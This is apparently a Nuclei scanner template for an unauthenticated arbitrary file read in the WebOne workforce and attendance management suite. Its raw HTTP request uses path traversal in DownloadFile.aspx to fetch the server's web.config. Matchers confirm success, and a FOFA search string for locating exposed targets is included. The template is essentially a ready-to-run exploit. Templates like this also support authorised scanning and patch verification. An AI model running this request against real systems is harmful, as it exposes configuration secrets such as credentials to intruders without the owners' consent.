http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <?xml version=
            - <configuration>
            - </configuration>
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /webForms/Download/DownloadFile.aspx?fileid=/../../web.config&flag=report HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
id: WebOne-DownloadFile_aspx-File-reading
info:
    author: Superhero
    description: |-
        fofa: title="Webone-WTS劳动力管理套件"
        WebOne 劳动力与考勤管理套件 DownloadFile.aspx 接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
    name: WebOne 劳动力与考勤管理套件 DownloadFile.aspx 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/t4HVuI52icCQDHnut4a4vg
    severity: high
    tags:
        - File reading
